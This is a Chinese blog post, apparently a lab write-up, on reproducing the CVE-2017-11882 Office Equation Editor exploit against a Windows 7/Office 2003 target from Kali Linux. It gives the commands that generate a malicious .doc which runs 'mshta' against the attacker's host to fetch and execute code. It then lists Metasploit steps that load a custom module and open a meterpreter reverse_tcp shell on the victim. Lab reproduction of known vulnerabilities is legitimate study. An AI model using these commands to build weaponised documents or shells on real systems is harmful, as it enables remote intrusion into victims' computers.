CVE-2017-11882漏洞复现过程中遇到的一些小问题

一、实验环境

靶机:Windows7 office2003  IP:192.168.87.129

渗透机:Kali Linux 2021.4a   IP:192.168.87.130

问题1:安装的office2003中插入-对象中没有Microsoft 公式 3.0

解决方法:工具-自定义-命令  类别“插入”中找到命令“公式编辑器” 将其拖到工具栏中,点击图标,提示该功能尚未安装,点击是进行安装。

二、使用POC代码生成word文件

root@kali:~/Desktop/CVE-2017-11882# python2 Command109b_CVE-2017-11882.py -c "cmd.exe /c calc.exe" -o calc.doc

上述代码生产的calc.doc文档在靶机上打开时会同时打开计算器,做测试用

root@kali:~/Desktop/CVE-2017-11882# python2  Command109b_CVE-2017-11882.py -c "mshta http://192.168.87.130:8080/11882" -o exploit.doc

上述代码生成的exploit.doc文档即攻击文档,备用。其中IP地址为渗透机Kali的IP地址,注意修改

问题2:Kali Linux 14.4a终端中python指令不存在,需用python2或python3执行,这里使用python3会报错

SyntaxError: Missing parentheses in call to 'print'. Did you mean print("[!] Primitive command must be shorter than 43 bytes")?

因此使用python2执行

三、加载PS_shell.rb模块

将PS_shell.rb拷贝至路径/usr/share/metasploit-framework/modules/exploits/windows/smb

在msfconsole中reload_all进行更新!!!

问题3:将PS_shell.rb改名为CVE-2017-11882.rb时会出现加载失败,发现是-符号的问题,可改名为CVE_2017_11882.rb

四、攻击流程

1、在Kali终端执行msfconsole

2、search CVE_2017_11882

3、use exploit/windows/smb/CVE_2017_11882

4、set payload windows/meterpreter/reverse_tcp

5、set LHOST 192.168.87.130(注意此处与生成exploit.doc文档的代码需相同)

6、set uripath 11882(注意此处与生成exploit.doc文档的代码需相同)

7、exploit

8、sessions(查看连接的会话)

9、sessions 1(进入连接,可以为所欲为了)

五、参考链接

具体流程参考[漏洞复现] CVE-2017-11882 通杀所有Office版本 - 知乎

相关文件下载参考CVE-2017-11882漏洞利用 - Oran9e - 博客园

  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值